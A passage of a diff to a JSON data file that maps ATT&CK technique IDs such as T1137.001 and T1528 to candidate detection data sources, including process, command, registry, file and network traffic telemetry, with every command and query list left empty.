This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "process" + }, + { + "data_source": "firmware", + "definition": "Information associated with computer software that provides the low-level control for a device's specific hardware.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "firmware modification", + "description": "The firmware of a system component was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "firmware" + }, + { + "data_source": "firmware", + "definition": "Information associated with computer software that provides the low-level control for a device's specific hardware.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "firmware modification", + "description": "The firmware of a system component was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "firmware" + }, + { + "data_source": "driver", + "definition": "Information associated with device drivers, or computer programs that operate or control a particular type of device that is attached to a computer.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Linux", + "macOS", + "Windows" + ], + "data_component": "driver metadata", + "description": "Data and information that describe a driver and activity around it such as driver issues reporting and driver integrity (Page hash, code) checking.", + 
"source_data_element": "host", + "relationship": "retrieved information about", + "target_data_element": "driver" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "api call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "system call" + }, + { + "data_source": "drive", + "definition": "Information associated with drive storage regions.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "drive modification", + "description": "A drive partition was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "drive" + } + ], + "external_reference": [ + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + null, + [ + "https://developer.apple.com/library/archive/documentation/DeviceDrivers/Conceptual/IOKitFundamentals/Features/Features.html", + "https://docs.microsoft.com/en-us/windows-hardware/drivers/gettingstarted/user-mode-and-kernel-mode" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + 
"https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=90009" + ] + ] + }, + { + "technique_id": "T1137.001", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line 
interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key creation", + "description": "A registry key was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key creation", + "description": "A registry key was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "windows registry key value" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": 
"modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file creation", + "description": "A file was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ] + ] + }, + { + "technique_id": "T1137.003", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", 
+ "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "application log", + "definition": "Logs from events in third-party applications (mail server, web applications, etc.).", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Google Workspace" + ], + "data_component": "application log 
content", + "description": "Data captured in an application log.", + "source_data_element": "application log", + "relationship": "contained", + "target_data_element": "application event entries" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://confluence.atlassian.com/doc/working-with-confluence-logs-108364721.html" + ] + ] + }, + { + "technique_id": "T1137.005", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + 
"target_data_element": "thread" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "application log", + "definition": "Logs from events in third-party applications (mail server, web applications, etc.).", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Google Workspace" + ], + "data_component": "application log content", + "description": "Data captured in an application log.", + "source_data_element": "application log", + "relationship": "contained", + "target_data_element": "application event entries" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + 
"https://confluence.atlassian.com/doc/working-with-confluence-logs-108364721.html" + ] + ] + }, + { + "technique_id": "T1547.013", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file creation", + "description": "A file was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + 
"Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1534", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "application log", + "definition": "Logs from events in third-party applications (mail server, web applications, etc.).", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Google Workspace" + ], + "data_component": "application log content", + "description": "Data captured in an application log.", + 
"source_data_element": "application log", + "relationship": "contained", + "target_data_element": "application event entries" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + } + ], + "external_reference": [ + [ + "https://confluence.atlassian.com/doc/working-with-confluence-logs-108364721.html" + ], + null + ] + }, + { + "technique_id": "T1528", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account modification", + "description": "A user account was modified.", + "source_data_element": "user", + "relationship": "requested modification of", + "target_data_element": "user" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. 
